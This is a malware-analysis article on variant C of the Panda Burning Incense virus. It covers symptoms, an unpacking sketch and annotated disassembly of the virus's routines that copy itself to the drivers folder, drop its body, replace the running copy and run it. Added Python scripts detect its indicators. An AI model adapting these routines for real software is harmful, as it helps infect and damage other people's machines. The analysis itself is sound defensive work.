Panda Virus (熊猫烧香) Analysis and Solution, Variant C
Author: LoveBoom
E-mail: Loveboom@163.com
URL: www.Loveboom.net

【Tools】: OllyDbg 1.1, IDA 5.0
【Task】: virus analysis and remedy
【Platform】: Windows 2003 Server
【Author】: LoveBoom [DFCG][FCG][CUG]
【Link】: N/A
【Remarks】: "Away from the party and the people for a year": I wasted 2006. I spent it lost in games, from Age of Empires to StarCraft, always chasing some so-called goal of my own; looking back now I find that not only did I never reach that goal, I drifted further and further from real life. Sitting down to write again, I notice my vocabulary has gone rusty :(. 2006 is over, and I do not want my 2007 to drift past the same way.
As for this virus, I think many of you know it: it raged in early 2007 and a lot of people were hit by it. This article is about that virus: what it actually does, and how we should deal with it.
【Virus analysis】:
Overview: I first came across this virus at the end of October, when it was nowhere near as widespread as it is now (it had probably only just appeared). After a few months of evolution, I got several new samples from a colleague a few days ago and found that they differ considerably from the early version. Based on those differences I divide the virus into four variants, A to D:

A: copies itself to %System32%\FuckJacks.exe, then infects the executables in every folder except a set of special system folders.
B: copies itself to %System32%\Drivers\spoclsv.exe and drops an infection-marker file in the root of drive C: while infecting.
C: no longer infects the executables on the user's system; instead it infects the script files on the system (which does far more damage) and writes an infection-marker file into every folder it has processed.
D: when infecting executables it no longer uses the direct bundling of variants A and B, so the icon of an infected program does not change (with A and B the icon of every infected executable turns into the burning-incense panda).

Today I analyse variant C (when I have time I will write up the analysis of variant A). Minor sub-versions differ in details, so if what you find on your machine resembles, but does not exactly match, what is described here, that is normal.
Symptoms of infection: the following are the visible signs of an infected machine:
1. setup.exe and autorun.inf appear in the root of every partition (drives A: and B: are not infected).
2. "Folder Options" can no longer be used to make hidden files visible.
3. Every processed folder contains a hidden file Desktop_.ini, 12 bytes long (the same trick as the Viking virus).
4. Every script file on the machine (*.htm, *.html, *.asp, *.php, *.js, *.aspx) has code injected by the virus (the injected snippet itself is missing from this copy of the article).
5. The common anti-virus products on the machine can no longer be started or used normally.
6. Task Manager and system inspection tools such as IceSword cannot be used.
7. A virus process spoclsv.exe, masquerading as a normal system process, appears in the process list.
8. The virus adds its own registry autostart entry to the system's startup items.
9. Unexplained outbound traffic and connections to other machines on the LAN.
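As an added example (not the author's tooling, and not code from the original article), here is a Python sweep that looks for the on-disk and process-list indicators in the list above. Paths are parameters so the same functions can be pointed at a mounted disk image or at a live machine; the sample directory tree and the `tasklist /fo csv` output it builds for the demo are constructed, and the 12-byte marker content planted in it is made up (the article gives the size, not the content).

```python
# Added example (not from the original article): offline sweep for the
# indicators listed above. Everything it scans is passed in as a path.
from __future__ import annotations

import csv
import io
import os
import tempfile
from pathlib import Path

MARKER_NAME = "desktop_.ini"      # compared case-insensitively
MARKER_SIZE = 12                  # length of the marker file reported in the article
FILE_ATTRIBUTE_HIDDEN = 0x2
FLOPPY_LETTERS = {"A", "B"}       # drives the virus never touches


def _is_hidden(path: Path) -> bool:
    """HIDDEN attribute on Windows; on a mounted image under another OS the
    attribute is not exposed by os.stat, so the size check alone has to do."""
    attrs = getattr(path.stat(), "st_file_attributes", None)
    return True if attrs is None else bool(attrs & FILE_ATTRIBUTE_HIDDEN)


def scan_marker_files(root: Path) -> list[Path]:
    """Every Desktop_.ini of exactly MARKER_SIZE bytes below root."""
    hits: list[Path] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != MARKER_NAME:
                continue
            p = Path(dirpath) / name
            try:
                if p.stat().st_size == MARKER_SIZE and _is_hidden(p):
                    hits.append(p)
            except OSError:
                pass  # unreadable entry: report nothing rather than abort the sweep
    return hits


def check_drive_root(root: Path) -> bool:
    """setup.exe and autorun.inf side by side in a drive root (A:/B: excluded)."""
    letter = root.drive.rstrip(":").upper() if root.drive else ""
    if letter in FLOPPY_LETTERS:
        return False
    return (root / "setup.exe").is_file() and (root / "autorun.inf").is_file()


def check_virus_body(system_dir: Path) -> bool:
    """%System32%\\drivers\\spoclsv.exe is where variant C drops its body."""
    return (system_dir / "drivers" / "spoclsv.exe").is_file()


def virus_pids(tasklist_csv: str) -> list[int]:
    """PIDs of spoclsv.exe in `tasklist /fo csv` output. The name imitates the
    Print Spooler, spoolsv.exe, which is why it is easy to overlook."""
    rows = csv.DictReader(io.StringIO(tasklist_csv))
    return [int(r["PID"]) for r in rows if r["Image Name"].lower() == "spoclsv.exe"]


def sweep(roots: list[Path], system_dir: Path, tasklist_csv: str = "") -> dict:
    return {
        "autorun_roots": [r for r in roots if check_drive_root(r)],
        "marker_files": [p for r in roots for p in scan_marker_files(r)],
        "virus_body": check_virus_body(system_dir),
        "virus_pids": virus_pids(tasklist_csv) if tasklist_csv else [],
    }


# Constructed tasklist output: one real spooler, one impostor.
SAMPLE_TASKLIST = (
    '"Image Name","PID","Session Name","Session#","Mem Usage"\n'
    '"spoolsv.exe","1348","Console","0","5,120 K"\n'
    '"spoclsv.exe","2204","Console","0","3,512 K"\n'
)


def demo() -> dict:
    """Build a fake drive with the indicators planted and sweep it."""
    with tempfile.TemporaryDirectory() as tmp:
        drive = Path(tmp) / "C"
        sysdir = drive / "WINDOWS" / "system32"
        (sysdir / "drivers").mkdir(parents=True)
        (sysdir / "drivers" / "spoclsv.exe").write_bytes(b"MZ")
        (drive / "setup.exe").write_bytes(b"MZ")
        (drive / "autorun.inf").write_text("[AutoRun]\n")
        (drive / "Work" / "Docs").mkdir(parents=True)
        marker = drive / "Work" / "Docs" / "Desktop_.ini"
        marker.write_bytes(b"2007-12-15\r\n")                 # 12 bytes, made-up content
        if os.name == "nt":                                   # give it the HIDDEN attribute the virus sets
            import ctypes
            ctypes.windll.kernel32.SetFileAttributesW(str(marker), FILE_ATTRIBUTE_HIDDEN)
        (drive / "Work" / "desktop.ini").write_bytes(b"[.ShellClassInfo]\r\n")  # genuine Windows file
        (drive / "Work" / "Other").mkdir()
        (drive / "Work" / "Other" / "Desktop_.ini").write_bytes(b"not the marker")  # 14 bytes: ignored
        result = sweep([drive], sysdir, SAMPLE_TASKLIST)
        return {
            "autorun_roots": len(result["autorun_roots"]),
            "marker_files": len(result["marker_files"]),
            "virus_body": result["virus_body"],
            "virus_pids": result["virus_pids"],
        }


if __name__ == "__main__":
    print(demo())
```

On a live machine, pass the real drive roots (every `Path(f"{letter}:\\")` that exists) and `Path(os.environ["SystemRoot"]) / "system32"`, and feed in the output of `tasklist /fo csv`; the registry autostart entry (item 8) is not covered here because the article does not name the key.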
Virus flow: the flow of this virus is fairly involved, so I have summarised it in a flow chart to guide the detailed analysis that follows:

(Figure 1, overall flow) Initialise -> Copy / drop the virus body -> Infect files -> Kill AV software / download malware -> End

(Figure 2) The file-infection part consists of: Infect files; Infect script files; Write AutoRun; LAN infection.
(Figure 3) The anti-AV / downloader part consists of: write registry autostart entry; download QQ trojan; download QQ trojan (a second one); clear anti-virus software; close local default shares.

The virus activates these modules with timers; the interval of each module is:

Module                            Interval (ms)
Write registry autostart entry    1000
Download trojan                   1200000
Download trojan                   (not given in the source)
Close shares                      10000
Clear anti-virus software         6000
Code analysis: following the flow chart above, we now peel the virus open layer by layer through its code. The sample I have is packed. The packer is simple, so I will only sketch the unpacking: load the target in OllyDbg and follow the listing below.

00414280 > 833D 404F4100 00        CMP DWORD PTR DS:[414F40],0
00414287   75 05                   JNZ SHORT 0041428E
00414289   E9 01000000             JMP 0041428F
0041428E   C3                      RETN
0041428F   E8 41000000             CALL 004142D5
00414294   B8 80424100             MOV EAX,OFFSET 00414280
00414299   2B05 084E4100           SUB EAX,DWORD PTR DS:[414E08]
0041429F   A3 3C4F4100             MOV DWORD PTR DS:[414F3C],EAX
004142A4   E8 5E000000             CALL 00414307
004142A9   E8 E0010000             CALL 0041448E
004142AE   E8 EC060000             CALL 0041499F
004142B3   E8 F7050000             CALL 004148AF
004142B8   A1 3C4F4100             MOV EAX,DWORD PTR DS:[414F3C]
004142BD   C705 404F4100 01000000  MOV DWORD PTR DS:[414F40],1
004142C7   0105 004E4100           ADD DWORD PTR DS:[414E00],EAX
004142CD   FF35 004E4100           PUSH DWORD PTR DS:[414E00]     ; pushes the original entry point
004142D3   C3                      RETN                           ; this RETN lands on the original program entry
004142D4   C3                      RETN

The unpacked program cannot be run directly, but it is good enough for IDA analysis :). Now let us start in IDA at the virus's initialisation:

CODE:0040CBBC ; =============== S U B R O U T I N E =======================================
CODE:0040CBBC ; virus entry point
CODE:0040CBBC ; Attributes: bp-based frame
CODE:0040CBBC                 public start
CODE:0040CBBC start           proc near
CODE:0040CBBC var_18          = dword ptr -18h
CODE:0040CBBC var_14          = dword ptr -14h
CODE:0040CBBC                 push    ebp
CODE:0040CBBD                 mov     ebp, esp
CODE:0040CBBF                 add     esp, -18h
CODE:0040CBC2                 push    ebx
CODE:0040CBC3                 xor     eax, eax
CODE:0040CBC5                 mov     [ebp+var_18], eax
CODE:0040CBC8                 mov     [ebp+var_14], eax
CODE:0040CBCB                 mov     eax, offset loc_40CB0C
CODE:0040CBD0                 call    sub_4049E8
CODE:0040CBD5                 mov     ebx, offset unk_40E7B8
CODE:0040CBDA                 xor     eax, eax
CODE:0040CBDC                 push    ebp
CODE:0040CBDD                 push    offset j_@System@@HandleFinally$qqrv_37
CODE:0040CBE2                 push    dword ptr fs:[eax]
CODE:0040CBE5                 mov     fs:[eax], esp
CODE:0040CBE8                 mov     eax, offset dword_40E7D4 ; the initialisation does two string comparisons;
CODE:0040CBE8                                         ; if either does not match, the program exits
CODE:0040CBED                 mov     edx, offset aF  ; "***武*汉*男*生*感*染*下*载*者***" ("Wuhan boy infecting downloader")
CODE:0040CBF2                 call    @System@@LStrAsg$qqrpvpxv
CODE:0040CBF7                 mov     eax, offset unk_40E7D8
CODE:0040CBFC                 mov     edx, offset aMMoperyAV ; "感谢艾玛,mopery对此木马的关注!~" ("thanks to 艾玛 and mopery for their attention to this trojan!~")
CODE:0040CC01                 call    @System@@LStrAsg$qqrpvpxv
CODE:0040CC06                 lea     ecx, [ebp+var_14]
CODE:0040CC09                 mov     edx, offset aXboy_0 ; "xboy"
CODE:0040CC0E                 mov     eax, offset aF_1 ; "***武*汉*男*生*感*染*下*载*者***"
CODE:0040CC13                 call    Decrypt
CODE:0040CC18                 mov     edx, [ebp+var_14]
CODE:0040CC1B                 mov     eax, ds:dword_40E7D4
CODE:0040CC20                 call    @System@@LStrCmp$qqrv ; compare the strings; exit if they differ
CODE:0040CC25                 jz      short loc_40CC30
CODE:0040CC27                 push    0               ; uExitCode
CODE:0040CC29                 call    ExitProcess_0
CODE:0040CC2E                 jmp     short loc_40CC81
CODE:0040CC30 loc_40CC30:                             ; CODE XREF: start+69j
CODE:0040CC30                 lea     ecx, [ebp+var_18]
CODE:0040CC33                 mov     edx, offset aWhboy ; "whboy"
CODE:0040CC38                 mov     eax, offset aUup2__uxeTmVhj ; "`uup2..uxe`tm/vhjnx.fdu/nsm&uyt"
CODE:0040CC3D                 call    Decrypt         ; this routine decrypts the string; to make reading easier
CODE:0040CC3D                                         ; I decrypted the strings first and then analysed in IDA
CODE:0040CC42                 mov     edx, [ebp+var_18]
CODE:0040CC45                 mov     eax, offset aUup2__uxeTmV_1 ; "`uup2..uxe`tm/vhjnx.fdu/nsm&uyt"
CODE:0040CC4A                 call    @System@@LStrCmp$qqrv
CODE:0040CC4F                 jz      short loc_40CC5A ; compare the two secret strings; if they differ, it is over
CODE:0040CC51                 push    0               ; uExitCode
CODE:0040CC53                 call    ExitProcess_0
CODE:0040CC58                 jmp     short loc_40CC81
CODE:0040CC5A loc_40CC5A:                             ; CODE XREF: start+93j
CODE:0040CC5A                 call    Copy_Virus_to_sp_dir ; copy the virus to its fixed folder.
CODE:0040CC5A                                         ; If this is an infected host file, drop the virus body
CODE:0040CC5A                                         ; and the original file, then run the original file.
CODE:0040CC5F                 call    Infect          ; this is the file-infection module
CODE:0040CC64                 call    Kill_AV_GetNetInfo ; kill anti-virus software and download other malware
CODE:0040CC69                 jmp     short loc_40CC71
CODE:0040CC6B loc_40CC6B:                             ; CODE XREF: start+C3j
CODE:0040CC6B                 push    ebx             ; lpMsg
CODE:0040CC6C                 call    DispatchMessageA
CODE:0040CC71 loc_40CC71:                             ; CODE XREF: start+ADj
CODE:0040CC71                 push    0               ; wMsgFilterMax
CODE:0040CC73                 push    0               ; wMsgFilterMin
CODE:0040CC75                 push    0               ; hWnd
CODE:0040CC77                 push    ebx             ; lpMsg
CODE:0040CC78                 call    GetMessageA
CODE:0040CC7D                 test    eax, eax
CODE:0040CC7F                 jnz     short loc_40CC6B
CODE:0040CC81 loc_40CC81:                             ; CODE XREF: start+72j
CODE:0040CC81                                         ; start+9Cj
CODE:0040CC81                 xor     eax, eax
CODE:0040CC83                 pop     edx
CODE:0040CC84                 pop     ecx
CODE:0040CC85                 pop     ecx
CODE:0040CC86                 mov     fs:[eax], edx
CODE:0040CC89                 push    offset aSN      ; "[n"
CODE:0040CC8E loc_40CC8E:                             ; DATA XREF: CODE:0040CCA1
CODE:0040CC8E                 lea     eax, [ebp+var_18]
CODE:0040CC91                 mov     edx, 2
CODE:0040CC96                 call    @System@@LStrArrayClr$qqrpvi
CODE:0040CC9B                 retn
CODE:0040CC9B start           endp ; sp = -24h

The initialisation is fairly simple, so I will not say more about it.
Next, let us look at how the virus copies itself to its fixed folder, and what it does when an infected program is run:

Copy_Virus_to_sp_dir:
CODE:00408061                 lea     edx, [ebp+appName]
CODE:00408067                 xor     eax, eax
CODE:00408069                 call    GetAppFullName
CODE:0040806E                 mov     eax, [ebp+appName]
CODE:00408074                 lea     edx, [ebp+FullName_szDesktopini]
CODE:0040807A                 call    GetAppPath
CODE:0040807F                 lea     eax, [ebp+FullName_szDesktopini]
CODE:00408085                 mov     edx, offset aDesktop__ini ; "Desktop_.ini"
CODE:0040808A                 call    @System@@LStrCat$qqrv
CODE:0040808F                 mov     eax, [ebp+FullName_szDesktopini]
CODE:00408095                 call    @Sysutils@FileExists$qqrx17System@AnsiString
CODE:0040809A                 test    al, al
CODE:0040809C                 jz      FileNotExitWay
CODE:004080A2                 push    FILE_ATTRIBUTE_NORMAL ; dwFileAttributes
CODE:004080A7                 lea     edx, [ebp+var_3C0]
CODE:004080AD                 xor     eax, eax
CODE:004080AF                 call    GetAppFullName
CODE:004080B4                 mov     eax, [ebp+var_3C0]
CODE:004080BA                 lea     edx, [ebp+var_3BC]
CODE:004080C0                 call    GetAppPath
CODE:004080C5                 lea     eax, [ebp+var_3BC]
CODE:004080CB                 mov     edx, offset aDesktop__ini ; "Desktop_.ini"
CODE:004080D0                 call    @System@@LStrCat$qqrv
CODE:004080D5                 mov     eax, [ebp+var_3BC]
CODE:004080DB                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004080E0                 push    eax             ; lpFileName
CODE:004080E1                 call    SetFileAttributesA ; reset the Desktop_.ini next to the virus to NORMAL
CODE:004080E6                 push    1               ; dwMilliseconds
CODE:004080E8                 call    Sleep
CODE:004080ED                 lea     edx, [ebp+var_3C8]
CODE:004080F3                 xor     eax, eax
CODE:004080F5                 call    GetAppFullName
CODE:004080FA                 mov     eax, [ebp+var_3C8]
CODE:00408100                 lea     edx, [ebp+var_3C4]
CODE:00408106                 call    GetAppPath
CODE:0040810B                 lea     eax, [ebp+var_3C4]
CODE:00408111                 mov     edx, offset aDesktop__ini ; "Desktop_.ini"
CODE:00408116                 call    @System@@LStrCat$qqrv
CODE:0040811B                 mov     eax, [ebp+var_3C4]
CODE:00408121                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:00408126                 push    eax             ; lpFileName
CODE:00408127                 call    DeleteFileA     ; delete the Desktop_.ini file
CODE:0040812C FileNotExitWay:                         ; CODE XREF: Copy_Virus_to_sp_dir+5Cj
CODE:0040812C                 lea     edx, [ebp+var_3CC]
CODE:00408132                 xor     eax, eax
CODE:00408134                 call    GetAppFullName
CODE:00408139                 mov     eax, [ebp+var_3CC]
CODE:0040813F                 lea     edx, [ebp+pMem]
CODE:00408142                 call    ReadFileToMem   ; read the virus's own file into memory
CODE:00408147                 lea     eax, [ebp+pInfectedFLG]
CODE:0040814A                 call    @System@@LStrClr$qqrpv
CODE:0040814F                 mov     eax, [ebp+pMem]
CODE:00408152                 call    unKnow          ; (unnamed in my IDB; from its use it returns the string length)
CODE:00408157                 mov     ebx, eax
CODE:00408159                 jmp     short loc_40817F
CODE:0040815B loc_40815B:                             ; CODE XREF: Copy_Virus_to_sp_dir+14Bj
CODE:0040815B                 lea     eax, [ebp+var_3D0]
CODE:00408161                 mov     edx, [ebp+pMem]
CODE:00408164                 mov     dl, [edx+ebx-1]
CODE:00408168                 call    @System@@LStrFromChar$qqrr17System@AnsiStringc
CODE:0040816D                 mov     edx, [ebp+var_3D0]
CODE:00408173                 lea     eax, [ebp+pInfectedFLG]
CODE:00408176                 mov     ecx, [ebp+pInfectedFLG]
CODE:00408179                 call    @System@@LStrCat3$qqrv ; pInfectedFLG := char + pInfectedFLG
CODE:0040817E                 dec     ebx
CODE:0040817F loc_40817F:                             ; CODE XREF: Copy_Virus_to_sp_dir+119j
CODE:0040817F                 test    ebx, ebx
CODE:00408181                 jle     short loc_40818D
CODE:00408183                 mov     eax, [ebp+pMem]
CODE:00408186                 cmp     byte ptr [eax+ebx-1], 0
CODE:0040818B                 jnz     short loc_40815B ; walk backwards from the last byte of the file while the byte is non-zero;
CODE:0040818B                                         ; the collected tail is the infection marker, which tells a clean
CODE:0040818B                                         ; virus body from an infected host file
CODE:0040818D loc_40818D:                             ; CODE XREF: Copy_Virus_to_sp_dir+141j
CODE:0040818D                 cmp     [ebp+pInfectedFLG], 0
CODE:00408191                 jnz     VirusatSysDir_or_infected ; infection marker present: go to the next step
CODE:00408197                 lea     edx, [ebp+szAppName]
CODE:0040819D                 xor     eax, eax
CODE:0040819F                 call    GetAppFullName
CODE:004081A4                 mov     eax, [ebp+szAppName]
CODE:004081AA                 lea     edx, [ebp+var_3D4]
CODE:004081B0                 call    upcase          ; convert the path to upper case
CODE:004081B5                 mov     eax, [ebp+var_3D4]
CODE:004081BB                 push    eax
CODE:004081BC                 lea     eax, [ebp+szSysDir]
CODE:004081C2                 call    GetSysDir
CODE:004081C7                 push    [ebp+szSysDir]
CODE:004081CD                 push    offset aDrivers ; "drivers\\"
CODE:004081D2                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:004081D7                 lea     eax, [ebp+var_3E0]
CODE:004081DD                 mov     edx, 3
CODE:004081E2                 call    @System@@LStrCatN$qqrv
CODE:004081E7                 mov     eax, [ebp+var_3E0]
CODE:004081ED                 lea     edx, [ebp+szDriverspoclsv.exe]
CODE:004081F3                 call    upcase
CODE:004081F8                 mov     edx, [ebp+szDriverspoclsv.exe]
CODE:004081FE                 pop     eax
CODE:004081FF                 call    @System@@LStrCmp$qqrv ; is the virus's current path %SysDir%\drivers\spoclsv.exe ?
CODE:00408204                 jz      VirusatSysDir_or_infected ; if the full path is not "%SysDir%\drivers\spoclsv.exe",
CODE:00408204                                         ; terminate the running virus process, copy the virus into
CODE:00408204                                         ; that folder and then execute it
CODE:0040820A                 mov     eax, offset aSpoclsv_exe ; "spoclsv.exe"
CODE:0040820F                 call    Kill_Process    ; terminate the virus process
CODE:00408214                 mov     eax, offset aSpoclsv_exe ; "spoclsv.exe"
CODE:00408219                 call    Kill_Process
CODE:0040821E                 mov     eax, offset aSpoclsv_exe ; "spoclsv.exe"
CODE:00408223                 call    Kill_Process
CODE:00408228                 push    FILE_ATTRIBUTE_NORMAL ; dwFileAttributes
CODE:0040822D                 lea     eax, [ebp+var_3EC]
CODE:00408233                 call    GetSysDir
CODE:00408238                 push    [ebp+var_3EC]
CODE:0040823E                 push    offset aDrivers ; "drivers\\"
CODE:00408243                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:00408248                 lea     eax, [ebp+var_3E8]
CODE:0040824E                 mov     edx, 3
CODE:00408253                 call    @System@@LStrCatN$qqrv
CODE:00408258                 mov     eax, [ebp+var_3E8]
CODE:0040825E                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:00408263                 push    eax             ; lpFileName
CODE:00408264                 call    SetFileAttributesA
CODE:00408269                 push    1               ; dwMilliseconds
CODE:0040826B                 call    Sleep
CODE:00408270                 push    0               ; bFailIfExists
CODE:00408272                 lea     eax, [ebp+var_3F4]
CODE:00408278                 call    GetSysDir
CODE:0040827D                 push    [ebp+var_3F4]
CODE:00408283                 push    offset aDrivers ; "drivers\\"
CODE:00408288                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:0040828D                 lea     eax, [ebp+var_3F0]
CODE:00408293                 mov     edx, 3
CODE:00408298                 call    @System@@LStrCatN$qqrv
CODE:0040829D                 mov     eax, [ebp+var_3F0]
CODE:004082A3                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004082A8                 push    eax             ; lpNewFileName
CODE:004082A9                 lea     edx, [ebp+var_3F8]
CODE:004082AF                 xor     eax, eax
CODE:004082B1                 call    GetAppFullName
CODE:004082B6                 mov     eax, [ebp+var_3F8]
CODE:004082BC                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004082C1                 push    eax             ; lpExistingFileName
CODE:004082C2                 call    CopyFileA       ; copy the virus to %SysDir%\drivers\spoclsv.exe
CODE:004082C7                 push    1               ; uCmdShow
CODE:004082C9                 lea     eax, [ebp+var_400]
CODE:004082CF                 call    GetSysDir
CODE:004082D4                 push    [ebp+var_400]
CODE:004082DA                 push    offset aDrivers ; "drivers\\"
CODE:004082DF                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:004082E4                 lea     eax, [ebp+var_3FC]
CODE:004082EA                 mov     edx, 3
CODE:004082EF                 call    @System@@LStrCatN$qqrv
CODE:004082F4                 mov     eax, [ebp+var_3FC]
CODE:004082FA                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004082FF                 push    eax             ; lpCmdLine
CODE:00408300                 call    WinExec         ; execute the copied virus
CODE:00408305                 push    0               ; uExitCode
CODE:00408307                 call    ExitProcess_0
CODE:0040830C VirusatSysDir_or_infected:              ; CODE XREF: Copy_Virus_to_sp_dir+151j
CODE:0040830C                                         ; Copy_Virus_to_sp_dir+1C4j
CODE:0040830C                 mov     eax, [ebp+pInfectedFLG] ; reached when this is an infected host file, or when the
CODE:0040830C                                         ; virus is already running from the drivers folder
CODE:0040830F                 call    unKnow
CODE:00408314                 mov     ecx, eax
CODE:00408316                 lea     eax, [ebp+pMem]
CODE:00408319                 mov     edx, ebx
CODE:0040831B                 call    @System@@LStrDelete$qqrv ; Delete(pMem, ebx, Length): strip the zero byte and the marker after it
CODE:00408320                 jmp     loc_4085EF
...
CODE:00408432 loc_408432:                             ; CODE XREF: Copy_Virus_to_sp_dir+3E6j
CODE:00408432                 call    CreateTmp_batFile
CODE:00408437                 mov     eax, offset aSpoclsv_exe ; "spoclsv.exe"
CODE:0040843C                 call    EnumProcess
CODE:00408441                 test    al, al
CODE:00408443                 jnz     ExitProc_4085E8 ; virus already running: nothing more to do
CODE:00408449                 push    FILE_ATTRIBUTE_NORMAL ; dwFileAttributes
CODE:0040844E                 lea     eax, [ebp+var_40C]
CODE:00408454                 call    GetSysDir
CODE:00408459                 push    [ebp+var_40C]
CODE:0040845F                 push    offset aDrivers ; "drivers\\"
CODE:00408464                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:00408469                 lea     eax, [ebp+var_408]
CODE:0040846F                 mov     edx, 3
CODE:00408474                 call    @System@@LStrCatN$qqrv
CODE:00408479                 mov     eax, [ebp+var_408]
CODE:0040847F                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:00408484                 push    eax             ; lpFileName
CODE:00408485                 call    SetFileAttributesA
CODE:0040848A                 push    1               ; dwMilliseconds
CODE:0040848C                 call    Sleep
CODE:00408491                 lea     eax, [ebp+var_414]
CODE:00408497                 call    GetSysDir
CODE:0040849C                 push    [ebp+var_414]
CODE:004084A2                 push    offset aDrivers ; "drivers\\"
CODE:004084A7                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:004084AC                 lea     eax, [ebp+var_410]
CODE:004084B2                 mov     edx, 3
CODE:004084B7                 call    @System@@LStrCatN$qqrv
CODE:004084BC                 mov     eax, [ebp+var_410]
CODE:004084C2                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004084C7                 push    eax             ; lpFileName
CODE:004084C8                 call    DeleteFileA
CODE:004084CD                 mov     eax, [ebp+pMem]
CODE:004084D0                 call    unKnow
CODE:004084D5                 mov     edx, eax
CODE:004084D7                 sub     edx, [ebp+var_18]
CODE:004084DA                 lea     eax, [ebp+pMem]
CODE:004084DD                 mov     ecx, [ebp+var_18]
CODE:004084E0                 call    @System@@LStrDelete$qqrv
CODE:004084E5                 mov     eax, [ebp+pMem]
CODE:004084E8                 call    unKnow
CODE:004084ED                 push    eax
CODE:004084EE                 mov     eax, [ebp+pMem]
CODE:004084F1                 call    unKnow
CODE:004084F6                 mov     edx, eax
CODE:004084F8                 lea     eax, [ebp+pMem]
CODE:004084FB                 pop     ecx
CODE:004084FC                 call    @System@@LStrDelete$qqrv
CODE:00408501                 lea     eax, [ebp+var_10]
CODE:00408504                 mov     edx, [ebp+pMem]
CODE:00408507                 call    @System@@LStrLAsg$qqrpvpxv
CODE:0040850C                 xor     eax, eax
CODE:0040850E                 push    ebp
CODE:0040850F                 push    offset loc_4085DE
CODE:00408514                 push    dword ptr fs:[eax]
CODE:00408517                 mov     fs:[eax], esp
CODE:0040851A                 lea     eax, [ebp+var_41C]
CODE:00408520                 call    GetSysDir
CODE:00408525                 push    [ebp+var_41C]
CODE:0040852B                 push    offset aDrivers ; "drivers\\"
CODE:00408530                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:00408535                 lea     eax, [ebp+var_418]
CODE:0040853B                 mov     edx, 3
CODE:00408540                 call    @System@@LStrCatN$qqrv
CODE:00408545                 mov     edx, [ebp+var_418]
CODE:0040854B                 lea     eax, [ebp+var_3B0]
CODE:00408551                 call    @System@@Assign$qqrr15System@TTextRecx17System@AnsiString
CODE:00408556                 mov     eax, ds:off_40D2BC
CODE:0040855B                 mov     byte ptr [eax], 2
CODE:0040855E                 lea     eax, [ebp+var_3B0]
CODE:00408564                 call    @System@@RewritText$qqrr15System@TTextRec
CODE:00408569                 call    @System@@_IOTest$qqrv
CODE:0040856E                 mov     edx, [ebp+var_10]
CODE:00408571                 lea     eax, [ebp+var_3B0]
CODE:00408577                 call    sub_404260      ; write the in-memory image out as %SysDir%\drivers\spoclsv.exe
CODE:0040857C                 call    @System@@Flush$qqrr15System@TTextRec
CODE:00408581                 call    @System@@_IOTest$qqrv
CODE:00408586                 lea     eax, [ebp+var_3B0]
CODE:0040858C                 call    @System@@Close$qqrr15System@TTextRec
CODE:00408591                 call    @System@@_IOTest$qqrv
CODE:00408596                 push    1               ; uCmdShow
CODE:00408598                 lea     eax, [ebp+var_424]
CODE:0040859E                 call    GetSysDir
CODE:004085A3                 push    [ebp+var_424]
CODE:004085A9                 push    offset aDrivers ; "drivers\\"
CODE:004085AE                 push    offset aSpoclsv_exe ; "spoclsv.exe"
CODE:004085B3                 lea     eax, [ebp+var_420]
CODE:004085B9                 mov     edx, 3
CODE:004085BE                 call    @System@@LStrCatN$qqrv
CODE:004085C3                 mov     eax, [ebp+var_420]
CODE:004085C9                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004085CE                 push    eax             ; lpCmdLine
CODE:004085CF                 call    WinExec
CODE:004085D4                 xor     eax, eax
CODE:004085D6                 pop     edx
...

What does this part do? The virus first checks whether it is the pure virus body. If it is not (that is, it is an infected host file), it drops the virus body and the original, pre-infection file. If it is the virus body, it checks whether it is running from the Drivers folder; if not, it kills the virus process already running, then replaces the existing virus body in the Drivers folder with itself (presumably a self-update mechanism). Finally it rewrites the Desktop_.ini file.
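As an added example (not code from the original article), the body-or-host test that Copy_Virus_to_sp_dir performs on its own image (the loop at 0040815B..0040818B and the LStrDelete at 0040831B), written out in Python so it can be run over a copied sample offline. The marker text and the fake PE bytes below are constructed for the demo; the article does not show what this variant actually appends.

```python
# Added example (not from the original article): the trailing-marker test the
# virus applies to its own file, as a reusable function for sample triage.
from __future__ import annotations


def split_trailing_marker(image: bytes) -> tuple[bytes, bytes]:
    """Return (payload, marker) for a file image.

    Starting at the last byte, step backwards while the byte is non-zero; the
    bytes stepped over are the infection marker (the virus rebuilds it with
    LStrCat3(char + marker), so it comes out in file order). An empty marker
    means the image is the bare virus body. Delete(pMem, ebx, Length(pMem))
    then removes the zero separator and everything after it; Delphi's Delete is
    a no-op when Index is 0 (no zero byte anywhere) or Count is 0.
    """
    i = len(image)
    while i > 0 and image[i - 1] != 0:
        i -= 1
    marker = image[i:]
    if i == 0 or not marker:
        return image, marker
    return image[: i - 1], marker


def is_infected_host(image: bytes) -> bool:
    """True when a marker is present, i.e. the file is an infected host, not the body."""
    return bool(split_trailing_marker(image)[1])


def describe(image: bytes) -> dict:
    """What an analyst wants when triaging a sample: kind, payload size, marker text."""
    payload, marker = split_trailing_marker(image)
    return {
        "kind": "infected host" if marker else "virus body",
        "payload_len": len(payload),
        "marker": marker.decode("latin-1"),
    }


# Constructed samples. A real PE image usually ends in zero padding, which is
# what the virus relies on; the marker layout is made up for this demo.
CLEAN_SAMPLE = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00" + bytes(range(1, 33)) + b"\x00" * 7
MARKER = b"demo-marker:notepad.exe:69632"
INFECTED_SAMPLE = CLEAN_SAMPLE + b"\x00" + MARKER

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        print(name, describe(img))
```

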